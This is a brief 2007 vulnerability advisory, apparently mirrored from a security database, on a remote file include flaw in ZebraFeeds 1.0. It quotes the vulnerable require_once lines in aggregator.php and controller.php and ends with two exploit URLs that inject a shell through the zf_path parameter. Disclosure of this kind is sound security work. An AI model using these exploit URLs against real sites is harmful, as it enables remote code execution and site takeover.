Lucene search
SecurityvulnsSECURITYVULNS:DOC:16088HistoryFeb 15, 2007 - 12:00 a.m.
ZebraFeeds 1.0 (zf_path) Remote File Include Vulnerabilities
2007-02-1500:00:00
vulners.com
36
To ConTacT mE @ wWw.Asb-May.net/bb
ScRiPt:-http://cazalet.org/zebrafeeds/releases/zebrafeeds-current.zip
Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP}>>
aggregator.php:-
require_once($zf_path . 'includes/feed.php');
require_once($zf_path . 'includes/view.php');
require_once($zf_path . 'includes/template.php');
require_once($zf_path . 'magpierss/rss_fetch.inc');
controller.php:-
require_once($zf_path . 'includes/template.php');
require_once($zf_path . 'includes/opml.php');
ExPlOiT:-http://www.SitE.com/newsfeeds/includes/aggregator.php?zf_path=[Shell]
ExPlOiT:-http://www.SitE.com/newsfeeds/includes/controller.php?zf_path=[Shell]